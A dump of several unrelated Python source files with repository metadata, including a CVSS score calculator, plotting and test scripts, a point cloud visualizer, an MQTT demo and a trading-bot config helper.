if v != "X" and k != "version":
value_list.append(f"{k}:{v}")
vector_string += "/".join(value_list)
###########################################
# Get all required values for calculations
###########################################
confidentiality = values_map['CIA'][args.get('C')]
modified_confidentiality = args.get('MC', "X")
modified_confidentiality = confidentiality if\
modified_confidentiality == "X" else values_map['CIA'][modified_confidentiality]
integrity = values_map['CIA'][args.get('I')]
modified_integrity = args.get('MI', "X")
modified_integrity = integrity if modified_integrity == "X" else values_map['CIA'][modified_integrity]
availability = values_map['CIA'][args.get('A')]
modified_availability = args.get('MA', "X")
modified_availability = availability if modified_availability == "X"\
else values_map['CIA'][modified_availability]
exploit_code_maturity = values_map["E"].get(args.get('E'), "X")
scope_changed = True if args.get('S') == "C" else False
modified_scope_changed = True if args.get('MS') == "C" else False
atack_vector = values_map['AV'].get(args.get('AV'), 0)
modified_attack_vector = args.get('MAV', "X")
modified_attack_vector = atack_vector if modified_attack_vector == "X"\
else values_map['AV'].get(modified_attack_vector, 0)
attack_complexity = values_map['AC'][args.get('AC')]
modified_attack_complexity = args.get('MAC', "X")
modified_attack_complexity = attack_complexity if modified_attack_complexity == "X"\
else values_map['AC'][modified_attack_complexity]
privileges_required = values_map['PR'][args.get('PR')]
if type(privileges_required) == dict:
privileges_required = privileges_required.get("C") if scope_changed or modified_scope_changed\
else privileges_required["U"]
modified_privileges_required = args.get('MPR', "X")
if modified_privileges_required == "X":
modified_privileges_required = privileges_required
elif type(modified_privileges_required) == dict:
modified_privileges_required = modified_privileges_required["C"] if scope_changed or\
modified_scope_changed else modified_privileges_required["U"]
else:
modified_privileges_required = values_map['PR'][modified_privileges_required]
user_interaction = values_map['UI'][args.get('UI')]
modified_user_interaction = args.get('MUI', "X")
modified_user_interaction = user_interaction if modified_user_interaction == "X"\
else values_map['UI'][modified_user_interaction]
remediation_level = values_map['RL'][args.get('RL', "X")]
report_confidence = values_map['RC'][args.get('RC', "X")]
confidentiality_requirement = values_map['CIAR'][args.get('CR', "X")]
integrity_requirement = values_map['CIAR'][args.get('IR', "X")]
availability_requirement = values_map['CIAR'][args.get('AR', "X")]
###########################################
# Base Metric Equation calculations
###########################################
# Impact Sub-Score
iss = 0
if version in ['3.0', '3.1']:
iss = 1 - ((1 - confidentiality) * (1 - integrity) * (1 - availability))
# Impact
impact = 0.0
if version in ['3.0', '3.1']:
if not scope_changed:
impact = 6.42 * iss
else:
impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15
# Exploitability
exploitability = 0.0
if version in ['3.0', '3.1']:
exploitability = 8.22 * atack_vector * attack_complexity * privileges_required * user_interaction
# Base Score
base_score = 0.0
if version in ['3.0', '3.1']:
base_score = 0
if impact > 0:
multiplier = 1.0
if scope_changed:
multiplier = 1.08
calculated_value = multiplier * (impact + exploitability)
base_score = calculated_value if calculated_value < 10.0 else 10.0
base_score = round_up(base_score)
###########################################
# Temporal Metric calculations
###########################################
temporal_score_roundup = 0.0
if version in ['3.0', '3.1']:
temporal_score_roundup = base_score * exploit_code_maturity * remediation_level * report_confidence
# Environmental Metrics
modified_impact_sub_score = 0.0
modified_impact = 0.0
modified_exploitability = 0.0
if version in ['3.0', '3.1']:
calculatedmodified_impact_sub_score = (
1 - (
(1 - confidentiality_requirement * modified_confidentiality)
* (1 - integrity_requirement * modified_integrity)
* (1 - availability_requirement * modified_availability)
)
)
modified_impact_sub_score = calculatedmodified_impact_sub_score if calculatedmodified_impact_sub_score < 0.915\
else 0.915
if version in ['3.0', '3.1']:
if modified_scope_changed:
if version == '3.0':
modified_impact = 7.52 * (modified_impact_sub_score - 0.029) - 3.25 *\
(modified_impact_sub_score * 0.9731 - 0.02) ** 15
elif version == '3.1':
modified_impact = 7.52 * (modified_impact_sub_score - 0.029) - 3.25 *\
(modified_impact_sub_score * 0.9731 - 0.02) ** 13
else:
modified_impact = 6.42 * modified_impact_sub_score
modified_exploitability = 8.22 * modified_attack_vector *\
modified_attack_complexity * modified_privileges_required * modified_user_interaction
# Environmental Score
environmental_score = 0.0
if version in ['3.0', '3.1']:
environmental_score = 0
if modified_impact > 0:
exponential = 1.0
if modified_scope_changed:
exponential = 1.08
calculated_value = exponential * (modified_impact + modified_exploitability)
calculated_value = calculated_value if calculated_value < 10 else 10
calculated_value = round_up(calculated_value)
environmental_score = calculated_value * exploit_code_maturity * remediation_level * report_confidence
environmental_score = round_up(environmental_score)
# Round values
iss = round_up(iss)
impact = round_up(impact)
exploitability = round_up(exploitability)
base_score = round_up(base_score)
temporal_score_roundup = round_up(temporal_score_roundup)
modified_impact_sub_score = round_up(modified_impact_sub_score)
modified_impact = round_up(modified_impact)
modified_exploitability = round_up(modified_exploitability)
environmental_score = round_up(environmental_score)
entry = {
"VectorString": vector_string,
"Version": version,
"ImpactSubScore": iss,
"Impact": impact,
"Exploitability": exploitability,
"BaseScore": base_score,
"TemporalScore": temporal_score_roundup,
"ModifiedImpactSubScore": modified_impact_sub_score,
"ModifiedImpact": modified_impact,
"ModifiedExploitability": modified_exploitability,
"EnvironmentalScore": environmental_score
}
hrentry = {k: v for k, v in entry.items() if v}
markdown = tableToMarkdown('CVSS Score:', hrentry)
results = CommandResults(
readable_output=markdown,
outputs_prefix='',
outputs_key_field='',
outputs={
'CVSS(val.VectorString === obj.VectorString && val.Version === obj.Version)': entry
}
)
return results
if __name__ in ['__main__', 'builtin', 'builtins']:
res = main()
return_results(res)
| 33.862275 | 119 | 0.496994 |
172bdfd38a3b4a68ec4d5979302aa83645e5817e
| 1,952 |
py
|
Python
|
Blatt5/src/script.py
|
lewis206/Computational_Physics
|
06ad6126685eaf65f5834bfe70ebd91b33314395
|
[
"MIT"
] | null | null | null |
Blatt5/src/script.py
|
lewis206/Computational_Physics
|
06ad6126685eaf65f5834bfe70ebd91b33314395
|
[
"MIT"
] | null | null | null |
Blatt5/src/script.py
|
lewis206/Computational_Physics
|
06ad6126685eaf65f5834bfe70ebd91b33314395
|
[
"MIT"
] | null | null | null |
import numpy as np
import matplotlib.pyplot as plt
import matplotlib
from scipy.optimize import curve_fit
# Set fontsize larger for plots
matplotlib.rcParams.update({'font.size': 20})
# Exercise 1
for i in ["",10,20,50]:
# Generate data from files
a = np.genfromtxt("output/data"+str(i)+".txt", unpack=True)
a.reshape(512,512)
# Plotting of the apes with k=512, 10, 20, 50
plt.figure(figsize=(12,12))
plt.imshow(a, cmap="gray")
plt.tight_layout()
plt.savefig("output/Bild"+str(i)+".pdf")
# Exercise 2, generate data from file
t_random, t_LU, t_solve = np.genfromtxt("output/times.txt", unpack=True)
# Fitting just for fun, to get an idea for the order of the exponent (because of log-log we fitted with a linear function)
num = np.arange(1,len(t_random)+1)
num_new = np.arange(12, 2000)
param_LU, err_LU = curve_fit(lambda x, a, N: a+x*N, np.log(num), np.log(t_LU))
param_random, err_random = curve_fit(lambda x, a, N: a+x*N, np.log(num), np.log(t_random))
param_solve, err_solve = curve_fit(lambda x, a, N: a+x*N, np.log(num), np.log(t_solve))
# Plotting for three different times
plt.figure(figsize=(12,8))
plt.plot(num, t_random, "x", label=r"$t_\mathrm{random}$", color="C0")
plt.plot(num_new, np.exp(param_random[0]+np.log(num_new)*param_random[1]), label=r"$N^{"+f"{param_random[1]:.2f}"+r"}$- Random", color="C0")
plt.plot(num, t_LU, "x", label=r"$t_\mathrm{LU}$", color="C1")
plt.plot(num_new, np.exp(param_LU[0]+np.log(num_new)*param_LU[1]), label=r"$N^{"+f"{param_LU[1]:.2f}"+r"}$- LU Zerlegung", color="C1")
plt.plot(num, t_solve, "x", label=r"$t_\mathrm{solve}$", color="C2")
plt.plot(num_new, np.exp(param_solve[0]+np.log(num_new)*param_solve[1]), label=r"$N^{"+f"{param_solve[1]:.2f}"+r"}$- Solve", color="C2")
plt.yscale("log")
plt.xscale("log")
plt.xlabel(r"Dimension $N$")
plt.ylabel(r"Zeit $t\, / \,\mathrm{s}$")
plt.grid()
plt.legend(loc="best")
plt.tight_layout()
plt.savefig("output/times.pdf")
| 44.363636 | 140 | 0.682377 |
e505c60ef60276d1b46cf32dd6e3eec9d7a56586
| 714 |
py
|
Python
|
src/unittest/python/erweitert/test_allgemein.py
|
dlangheiter-tgm/test-mirror
|
9878da44953c40abc1df0311f275c3eebc2e876b
|
[
"MIT"
] | null | null | null |
src/unittest/python/erweitert/test_allgemein.py
|
dlangheiter-tgm/test-mirror
|
9878da44953c40abc1df0311f275c3eebc2e876b
|
[
"MIT"
] | null | null | null |
src/unittest/python/erweitert/test_allgemein.py
|
dlangheiter-tgm/test-mirror
|
9878da44953c40abc1df0311f275c3eebc2e876b
|
[
"MIT"
] | null | null | null |
"""
Created on 27.12.2013
@author: Walter Rafeiner-Magor <[email protected]>
"""
import unittest
from bruch.Bruch import *
class TestAllgemein(unittest.TestCase):
def setUp(self):
self.b = Bruch(3, 2)
self.b2 = Bruch(self.b)
self.b3 = Bruch(4, 2)
pass
def tearDown(self):
del self.b, self.b2, self.b3
pass
def testInteger(self):
self.b2 = Bruch(3, 1)
assert(str(self.b2) == '(3)')
def test_makeBruchTypeError(self):
self.assertRaises(TypeError, Bruch._Bruch__makeBruch, "other")
def test_makeBruchInt(self):
value = 3
b4 = Bruch._Bruch__makeBruch(value)
assert(b4.zaehler == value)
| 21.636364 | 70 | 0.609244 |
e5394c626cc694eb29672ca3c2176a352e19433c
| 23 |
py
|
Python
|
test/test.py
|
ruum42/pySchloss
|
f1415b48187ef0966019051e7681ae59a274215b
|
[
"Apache-2.0"
] | 12 |
2015-02-14T15:15:40.000Z
|
2020-06-23T12:32:05.000Z
|
test/test.py
|
hassoon1986/pySchloss
|
f1415b48187ef0966019051e7681ae59a274215b
|
[
"Apache-2.0"
] | null | null | null |
test/test.py
|
hassoon1986/pySchloss
|
f1415b48187ef0966019051e7681ae59a274215b
|
[
"Apache-2.0"
] | 7 |
2015-07-29T18:54:37.000Z
|
2021-01-27T17:24:37.000Z
|
__author__ = 'madmike'
| 11.5 | 22 | 0.73913 |
c1e91243ba2517f0c7942cf7a5db8428c599ff05
| 1,804 |
py
|
Python
|
python/douban/test/testBs4.py
|
TimVan1596/ACM-ICPC
|
07f7d728db1ecd09c5a3d0f05521930b14eb9883
|
[
"Apache-2.0"
] | 1 |
2019-05-22T07:12:34.000Z
|
2019-05-22T07:12:34.000Z
|
python/douban/test/testBs4.py
|
TimVan1596/ACM-ICPC
|
07f7d728db1ecd09c5a3d0f05521930b14eb9883
|
[
"Apache-2.0"
] | 3 |
2021-12-10T01:13:54.000Z
|
2021-12-14T21:18:42.000Z
|
python/douban/test/testBs4.py
|
TimVan1596/ACM-ICPC
|
07f7d728db1ecd09c5a3d0f05521930b14eb9883
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding:utf-8 -*-
# @Time:2020/8/7 17:37
# @Author:TimVan
# @File:testBs4.py
# @Software:PyCharm
# from bs4 import BeautifulSoup
#
# file = open("./baidu.html", "rb")
# html = file.read()
# bs = BeautifulSoup(html, "html.parser")
# 1、Tag,标签
# print(bs.title)
# print(bs.head)
# print(bs.a)
# print(type(bs.head))
# 2、NavigableString,简单理解为标签中的内容,即字符串
# res = bs.title.string
# print(bs.title.string)
# print(type(res))
# res = bs.a.attrs
# print(res)
# print(type(res))
# 3、BeautifulSoap,整个文档
# res = bs
# print(res)
# print(type(res))
# 4、Comment 注释类型
# res = bs.a.string
# print(res)
# print(type(res))
from bs4 import BeautifulSoup
file = open("./baidu.html", "rb")
html = file.read()
bs = BeautifulSoup(html, "html.parser")
# 对文档进行遍历
# res = bs.head.contents
# print(res)
# print(type(res))
# print(res[1])
# 对文档进行搜索
# ① find_all()
# 字符串过滤
# res = bs.find_all("a")
# print(res)
# 正则表达式
# import re
# res = bs.find_all(re.compile("a"))
# print(res)
# 方法,传入函数进行判断
# def is_exist_class(tag):
# # has_attr 返回true or false
# return tag.has_attr("class")
#
# # 注意内容可重复(交叉)
# res = bs.find_all(is_exist_class)
# print(res)
# key word args 参数
# res = bs.find_all(id="s-top-left")
# for item in res:
# print(item)
# res = bs.find_all(class_="carbon-text")
# for item in res:
# print(item)
# 存在content
# res = bs.find_all(content=True)
# for item in res:
# print(item)
# 文本参数
import re
# res = bs.find_all(text=['地图', '贴吧'])
# 正则表达式
# res = bs.find_all(text=re.compile('\d'))
# for item in res:
# print(item)
# limit,取多少个
# res = bs.find_all('a',limit=3)
# for item in res:
# print(item)
# css选择器
# res = bs.select('.carbon-text')
# res = bs.select('#tieba')
# res = bs.select('a[class="carbon-text"]')
res = bs.select('div>a')
for item in res:
print(item)
| 17.514563 | 43 | 0.633592 |
de1591a2f189036b901f2843ae869ec8189e0b90
| 220 |
py
|
Python
|
klufweb/feed/admin.py
|
mseln/klufweb
|
a785d44415fde933723220fab7f18f2ae4fd748d
|
[
"Apache-2.0"
] | null | null | null |
klufweb/feed/admin.py
|
mseln/klufweb
|
a785d44415fde933723220fab7f18f2ae4fd748d
|
[
"Apache-2.0"
] | 5 |
2015-05-22T12:05:54.000Z
|
2015-05-22T12:09:06.000Z
|
klufweb/feed/admin.py
|
mseln/klufweb
|
a785d44415fde933723220fab7f18f2ae4fd748d
|
[
"Apache-2.0"
] | null | null | null |
from django.contrib import admin
from feed.models import NewsArticle, NewsArticleAdmin
from feed.models import Event, EventAdmin
admin.site.register(NewsArticle, NewsArticleAdmin)
admin.site.register(Event, EventAdmin)
| 31.428571 | 53 | 0.845455 |
a9e9292502b02f2c93833c4dd03a154fd7fb62bd
| 5,821 |
py
|
Python
|
python/tutlibs/visualization.py
|
Obarads/Point_Cloud_Tutorial
|
faf7ae8abf962ecea414cc7557dc35f4fca0e406
|
[
"MIT"
] | 1 |
2021-11-22T10:32:49.000Z
|
2021-11-22T10:32:49.000Z
|
python/tutlibs/visualization.py
|
Obarads/Point_Cloud_Tutorial
|
faf7ae8abf962ecea414cc7557dc35f4fca0e406
|
[
"MIT"
] | 1 |
2021-12-09T14:39:51.000Z
|
2021-12-09T14:39:51.000Z
|
python/tutlibs/visualization.py
|
Obarads/Point_Cloud_Tutorial
|
faf7ae8abf962ecea414cc7557dc35f4fca0e406
|
[
"MIT"
] | null | null | null |
import numpy as np
import k3d
from typing import List
from tutlibs.utils import color_range_rgb_to_8bit_rgb, rgb_to_hex, single_color
from tutlibs.operator import gather
class JupyterVisualizer:
def __init__(self) -> None:
print("Note: this class is staticmethod only.")
@staticmethod
def display(objects:list, camera_init:List[float]=None):
"""Visualize objects.
Args:
objects: object list
camera_init: camera 9th vector.
"""
plot = k3d.plot()
for obj in objects:
plot += obj
if camera_init is not None:
plot.camera = camera_init
plot.display()
@staticmethod
def line(lines: np.ndarray, colors: np.ndarray = None, color_range: list = [0, 255],
width=0.002, shader='simple'):
"""Create line objects for visualizer.
Args:
lines: start and end points of lines (N, 2, 3)
colors: RGB (N, 3) or color code (N)
color_range: color value range for RGB (min, max color value)
width: width of lines on visualizer
Note:
N: number of lines
"""
N, _, _ = lines.shape
# shader setup and spliting lines
if shader == 'thick':
split_lines = np.concatenate([
np.full((N, 1, 3), 1),
np.full((N, 1, 3), np.nan),
np.full((N, 1, 3), 1)
], axis=1, dtype=np.float32)
split_colors = np.full((N, 3), fill_value=1, dtype=np.uint32)
elif shader == 'simple':
split_lines = np.concatenate([
np.full((N, 1, 3), np.nan),
], axis=1, dtype=np.float32)
split_colors = np.full((N, 1), fill_value=1, dtype=np.uint32)
# split_colors = np.tile(colors[:, np.newaxis, :], (1, 3, 1)).reshape(-1, 3)
else:
raise NotImplementedError()
# xyz setup
lines = np.concatenate([lines, split_lines], axis=1).reshape(-1, 3)
# color setup (get color codes)
if colors is not None:
colors = color_range_rgb_to_8bit_rgb(colors, color_range)
colors = rgb_to_hex(colors)
colors = np.hstack(
[np.tile(colors.reshape(-1, 1), (1, 2)), split_colors]
).reshape(-1)
else:
colors = []
obj_lines = k3d.line(lines, colors=colors, width=width, shader=shader)
return obj_lines
@staticmethod
def point(xyz: np.ndarray, colors: np.ndarray = None, color_range: List[float]= [0, 255],
point_size: float = 0.01):
"""Create a point cloud object for visualizer.
Args:
xyz: XYZ positions (N, 3)
colorts : RGB (N, 3) or color code (N)
color_range: color value range for RGB (min, max color value)
point_size: size of points on visualizer
Note:
N: number of points
"""
# error check
assert type(xyz) == np.ndarray
assert type(colors) == np.ndarray or colors is None
if colors is not None:
assert len(colors.shape) in [
1, 2], '{}, Expected colors is rgb (N, 3) or color codes (N).'.format(colors.shape)
assert len(colors) == len(xyz)
# xyz setup
xyz = xyz.astype(np.float32)
# color setup
if colors is not None:
# to 0 ~ 255 color range
colors = color_range_rgb_to_8bit_rgb(colors, color_range)
# to color code
colors = rgb_to_hex(colors)
else:
colors = []
obj_points = k3d.points(xyz, colors=colors, point_size=point_size, shader='flat')
return obj_points
@staticmethod
def voxel(voxels: np.ndarray, color:int=0x0000ff):
"""Create voxel objects for visualizer.
Args:
voxels: voxel data, (N, N, N)
color: hexadecimal voxel color, single color only
Note:
N: number of voxel on a side.
"""
obj_voxel = k3d.voxels(voxels, color_map=(color), compression_level=1)
# obj_voxel = k3d.sparse_voxels(voxels, [1, 1, 1], color_map=(color), compression_level=1)
return obj_voxel
@staticmethod
def mesh(vertices: np.ndarray, edges: np.ndarray, colors: np.ndarray = None, color_range: List[float]=[0, 255]):
if colors is not None:
# to 0 ~ 255 color range
colors = color_range_rgb_to_8bit_rgb(colors, color_range)
# to color code
colors = rgb_to_hex(colors)
else:
colors = []
obj_mesh = k3d.mesh(vertices=vertices, indices=edges, colors=colors, side='double')
return obj_mesh
class JupyterVisualizerUtils:
def __init__(self) -> None:
print("Note: this class is staticmethod only.")
@staticmethod
def correspondence_line(source_xyz, target_xyz, corr_set, line_colors:str=None):
"""Create correspondence line for registration.
Args:
source_xyz: xyz of source points, (N, 3)
target_xyz: xyz of target points, (M, 3)
corr_set: indices of correspondences between source and target points (L, 2)
line_colors: colors of correspondence lines (L, 3)
"""
source_xyz = gather(source_xyz, corr_set[:, 0])
target_xyz = gather(target_xyz, corr_set[:, 1])
line_xyz = np.concatenate([source_xyz[:, np.newaxis, :], target_xyz[:, np.newaxis, :]], axis=1)
if line_colors is None:
line_colors = single_color("#0000ff", len(line_xyz))
obj_line = JupyterVisualizer.line(line_xyz, width=0.06, colors=line_colors, color_range=[0, 255], shader='simple')
return obj_line
| 35.493902 | 122 | 0.574644 |
99c7c801eb7060e1eaeaf99633bec510fa2b99e8
| 206 |
py
|
Python
|
foundation/patches/v0_0/update_erpnext_job_route.py
|
prafful1234/foundation
|
6fcb027e76eae8d307c3dd70436a9657ff681f01
|
[
"MIT"
] | 59 |
2017-03-15T08:14:52.000Z
|
2021-11-17T14:21:58.000Z
|
foundation/patches/v0_0/update_erpnext_job_route.py
|
prafful1234/foundation
|
6fcb027e76eae8d307c3dd70436a9657ff681f01
|
[
"MIT"
] | 147 |
2017-01-25T10:44:47.000Z
|
2020-11-05T04:24:22.000Z
|
foundation/patches/v0_0/update_erpnext_job_route.py
|
prafful1234/foundation
|
6fcb027e76eae8d307c3dd70436a9657ff681f01
|
[
"MIT"
] | 134 |
2017-03-14T14:04:21.000Z
|
2022-03-18T08:19:47.000Z
|
import frappe
def execute():
for job in frappe.get_all("Portal Job"):
frappe.db.set_value("Portal Job", job.name, "route", "erpnext-job/{0}".format(job.name.encode('utf-8')),
update_modified=False)
| 25.75 | 106 | 0.699029 |
d87f35e3623a22088ffab8da999d951445fda9f4
| 1,270 |
py
|
Python
|
mqtt/mqtt_publish_und_subscribe.py
|
wichmann/RaspPI
|
168609cb237e59a4c895eae798c0dab052aab38b
|
[
"MIT"
] | null | null | null |
mqtt/mqtt_publish_und_subscribe.py
|
wichmann/RaspPI
|
168609cb237e59a4c895eae798c0dab052aab38b
|
[
"MIT"
] | null | null | null |
mqtt/mqtt_publish_und_subscribe.py
|
wichmann/RaspPI
|
168609cb237e59a4c895eae798c0dab052aab38b
|
[
"MIT"
] | null | null | null |
#! /usr/bin/env python3
# Notwendige Bibliothek installieren:
# pip3 install paho-mqtt
import time
import random
import paho.mqtt.client as mqtt
TOPIC = "test/topic"
def on_connect(mqttc, obj, flags, rc):
print("rc: "+str(rc))
def on_message(mqttc, obj, msg):
print(msg.topic+" "+str(msg.qos)+" "+str(msg.payload))
def on_publish(mqttc, obj, mid):
print("mid: "+str(mid))
def on_subscribe(mqttc, obj, mid, granted_qos):
print("Subscribed: "+str(mid)+" "+str(granted_qos))
def on_log(mqttc, obj, level, string):
print(string)
# erzeuge Objekt für die Verbindung zum MQTT-Broker
mqttc = mqtt.Client()
# setze Funktionen für verschiedene Ereignisse
mqttc.on_message = on_message
mqttc.on_connect = on_connect
mqttc.on_publish = on_publish
mqttc.on_subscribe = on_subscribe
# baue Verbindung zum Broker auf
mqttc.connect("192.168.24.129", port=1883, keepalive=120)
# abboniere ein Thema beim Broker
mqttc.subscribe(TOPIC, 0)
# starte einen Hintergrundprozess, der Daten vom Broker entgegen nimmt
mqttc.loop_start()
while True:
print("Publishing data...")
# veröffentliche eine neue Nachricht alle zwei Sekunden
mqttc.publish(TOPIC, "Current number: {}".format(random.randint(0, 100)))
time.sleep(2)
mqttc.loop_stop()
| 23.518519 | 77 | 0.724409 |
510ed5876673fe1388bbf7d8da65384ce0c75909
| 356 |
py
|
Python
|
frappe-bench/apps/erpnext/erpnext/regional/__init__.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | null | null | null |
frappe-bench/apps/erpnext/erpnext/regional/__init__.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | null | null | null |
frappe-bench/apps/erpnext/erpnext/regional/__init__.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | null | null | null |
# Copyright (c) 2018, Frappe Technologies and contributors
# For license information, please see license.txt
import frappe
from frappe import _
from erpnext import get_region
def check_deletion_permission(doc, method):
region = get_region()
if region in ["Nepal", "France"]:
frappe.throw(_("Deletion is not permitted for country {0}".format(region)))
| 32.363636 | 77 | 0.769663 |
5ad86b41dfe4152a2326a658948614ecf4731f23
| 749 |
py
|
Python
|
back-end/src/run_query.py
|
akshah/iodb
|
80fbad1cb639e2cad304d6565cf4918ee5b4e4c0
|
[
"Apache-2.0"
] | null | null | null |
back-end/src/run_query.py
|
akshah/iodb
|
80fbad1cb639e2cad304d6565cf4918ee5b4e4c0
|
[
"Apache-2.0"
] | null | null | null |
back-end/src/run_query.py
|
akshah/iodb
|
80fbad1cb639e2cad304d6565cf4918ee5b4e4c0
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
from __future__ import print_function
from collections import defaultdict
from contextlib import closing
import MySQLdb
import sys
def run_query(db,query):
toReturn=[]
with closing( db.cursor() ) as cur:
try:
cur.execute(query)
row=cur.fetchone()
while row is not None:
print(row)
toReturn.append(row)
row=cur.fetchone()
except:
raise Exception('Query Failed')
return toReturn
#Preapre DB info
db = MySQLdb.connect(host="proton.netsec.colostate.edu",
user="root",
passwd="n3ts3cm5q1",
db="iodb")
result=run_query(db,'SELECT PeerIPID FROM Message;')
#for result_v in result:
# print(result_v)
db.close()
| 19.710526 | 56 | 0.639519 |
5c84a76c3c7e738b481bfc023bcc063134094892
| 1,465 |
py
|
Python
|
kts/core/backend/worker.py
|
konodyuk/kts
|
3af5ccbf1d2089cb41d171626fcde4b0ba5aa8a7
|
[
"MIT"
] | 18 |
2019-02-14T13:10:07.000Z
|
2021-11-26T07:10:13.000Z
|
kts/core/backend/worker.py
|
konodyuk/kts
|
3af5ccbf1d2089cb41d171626fcde4b0ba5aa8a7
|
[
"MIT"
] | 2 |
2019-02-17T14:06:42.000Z
|
2019-09-15T18:05:54.000Z
|
kts/core/backend/worker.py
|
konodyuk/kts
|
3af5ccbf1d2089cb41d171626fcde4b0ba5aa8a7
|
[
"MIT"
] | 2 |
2019-09-15T13:12:42.000Z
|
2020-04-15T14:05:54.000Z
|
import os
import traceback
from typing import Dict
import pandas as pd
import ray
import kts.core.backend.signal as rs
from kts.core.backend import signal, address_manager
from kts.core.backend.progress import ProgressSignal
from kts.core.backend.signal import RunPID
from kts.core.backend.stats import Stats
from kts.core.frame import KTSFrame
@ray.remote(num_return_vals=3, max_retries=0)
def worker(self, *args, df: pd.DataFrame, meta: Dict):
assert 'run_manager' not in meta
assert 'report' not in meta
assert 'pid' in meta
signal.pid = meta['pid']
address_manager.pid = meta['pid']
kf = KTSFrame(df, meta=meta)
kf.__meta__['remote'] = True
return_state = kf._train
if self.verbose:
rs.send(ProgressSignal(0, 1, None, None, None))
io = self.remote_io()
else:
io = self.suppress_io()
rs.send(RunPID(os.getpid()))
stats = Stats(df)
with stats, io, self.suppress_stderr():
try:
res_kf = self.compute(*args, kf)
except:
rs.send(rs.ErrorSignal(traceback.format_exc()))
return None, None, None
if 'columns' in dir(res_kf) and '__columns' not in kf._state:
kf._state['__columns'] = list(res_kf.columns)
if return_state:
res_state = kf._state
else:
res_state = None
if self.verbose:
rs.send(ProgressSignal(1, 1, stats.data['took'], None, None))
return res_kf, res_state, stats.data
| 28.72549 | 69 | 0.664164 |
7a85df348f5f29fd89d42fefc01f170003300bc9
| 1,089 |
py
|
Python
|
tradingbot/core/config.py
|
stefaniuk/trading-bot
|
403abd2b53caf686a6d2456e7eab124c670e7340
|
[
"MIT"
] | 3 |
2018-05-10T13:51:42.000Z
|
2020-07-05T16:43:45.000Z
|
tradingbot/core/config.py
|
stefaniuk/trading-bot
|
403abd2b53caf686a6d2456e7eab124c670e7340
|
[
"MIT"
] | null | null | null |
tradingbot/core/config.py
|
stefaniuk/trading-bot
|
403abd2b53caf686a6d2456e7eab124c670e7340
|
[
"MIT"
] | 1 |
2020-04-22T09:06:17.000Z
|
2020-04-22T09:06:17.000Z
|
import configparser
import os
class Configurer(object):
def __init__(self, name="data.ini"):
self.config = configparser.ConfigParser()
self.config_file = self._combine(name)
def _combine(self, path):
return os.path.join(os.path.dirname(os.path.dirname(__file__)), path)
def write(self):
with open(self.config_file, 'w') as cf:
self.config.write(cf)
def addLogin(self, username, password):
self.config['TRADING212'] = {'username': username,
'password': password}
self.write()
def addMonitor(self, username, password, stocks):
self.config['MONITOR'] = {'username': username,
'password': password,
'stocks': stocks,
'initiated': 0}
self.write()
def read(self):
self.config.read(self.config_file)
def checkFile(self):
if os.path.isfile(self._combine(self.config_file)):
return 1
else:
return 0
| 29.432432 | 77 | 0.545455 |
8f8db2af3a47bbf9a55d8a9e2f6a7ea22d477c2b
| 377 |
py
|
Python
|
tag_1/p_3_2_fakultaet_berechnen.py
|
techrabbit58/uebung_informatik_vorkurs
|
e99312ae66ccccd6bfe45bfd3c3f43c01690659c
|
[
"Unlicense"
] | null | null | null |
tag_1/p_3_2_fakultaet_berechnen.py
|
techrabbit58/uebung_informatik_vorkurs
|
e99312ae66ccccd6bfe45bfd3c3f43c01690659c
|
[
"Unlicense"
] | null | null | null |
tag_1/p_3_2_fakultaet_berechnen.py
|
techrabbit58/uebung_informatik_vorkurs
|
e99312ae66ccccd6bfe45bfd3c3f43c01690659c
|
[
"Unlicense"
] | null | null | null |
"""
3 for/whils-Schleifen (Tag 1)
3.2 Schreibe ein Programm, das für eine vorher festgelegte Zahl die Fakultät berechnet.
Beispiele:
- 5! = 120
- 10! = 3628800
"""
def fakultaet(n):
antwort = 1
while n > 1:
antwort *= n
n -= 1
return antwort
if __name__ == '__main__':
assert fakultaet(5) == 120
assert fakultaet(10) == 3628800
| 17.136364 | 87 | 0.604775 |
56f5289febffa30278a50b6d4923dd0ea6c73986
| 1,229 |
py
|
Python
|
bildungslogin-plugin/bildungslogin_plugin/backend.py
|
univention/bildungslogin
|
29bebe858a5445dd5566aad594b33b9dd716eca4
|
[
"MIT"
] | null | null | null |
bildungslogin-plugin/bildungslogin_plugin/backend.py
|
univention/bildungslogin
|
29bebe858a5445dd5566aad594b33b9dd716eca4
|
[
"MIT"
] | null | null | null |
bildungslogin-plugin/bildungslogin_plugin/backend.py
|
univention/bildungslogin
|
29bebe858a5445dd5566aad594b33b9dd716eca4
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import annotations
import abc
from .models import User
class ConfigurationError(ConnectionError):
...
class DbConnectionError(ConnectionError):
...
class UserNotFound(Exception):
...
class DbBackend(abc.ABC):
"""Base class for LDAP database access."""
def __init__(self, *args, **kwargs):
"""
:raises ConfigurationError: when the data passed in `args` or `kwargs` is not as expected
"""
...
async def connection_test(self) -> None:
"""
Test DB connection.
:return: nothing if successful or raises an error
:raises DbConnectionError: if connecting failed
"""
raise NotImplementedError # pragma: no cover
async def get_user(self, username: str) -> User:
"""
Load a user object and its school, class and license information from LDAP.
:param str username: the `uid` LDAP attribute
:return: User object
:rtype: User
:raises ConnectionError: when a problem with the connection happens
:raises UserNotFound: when a user could not be found in the DB
"""
raise NotImplementedError # pragma: no cover
| 24.58 | 97 | 0.634662 |
85410c74b57eb924a702e9207da61927e86c9a72
| 1,084 |
py
|
Python
|
Theories/Algorithms/Recursion2/Searcha2DMatrixII/search_2d_matrixII.py
|
dolong2110/Algorithm-By-Problems-Python
|
31ecc7367aaabdd2b0ac0af7f63ca5796d70c730
|
[
"MIT"
] | 1 |
2021-08-16T14:52:05.000Z
|
2021-08-16T14:52:05.000Z
|
Theories/Algorithms/Recursion2/Searcha2DMatrixII/search_2d_matrixII.py
|
dolong2110/Algorithm-By-Problems-Python
|
31ecc7367aaabdd2b0ac0af7f63ca5796d70c730
|
[
"MIT"
] | null | null | null |
Theories/Algorithms/Recursion2/Searcha2DMatrixII/search_2d_matrixII.py
|
dolong2110/Algorithm-By-Problems-Python
|
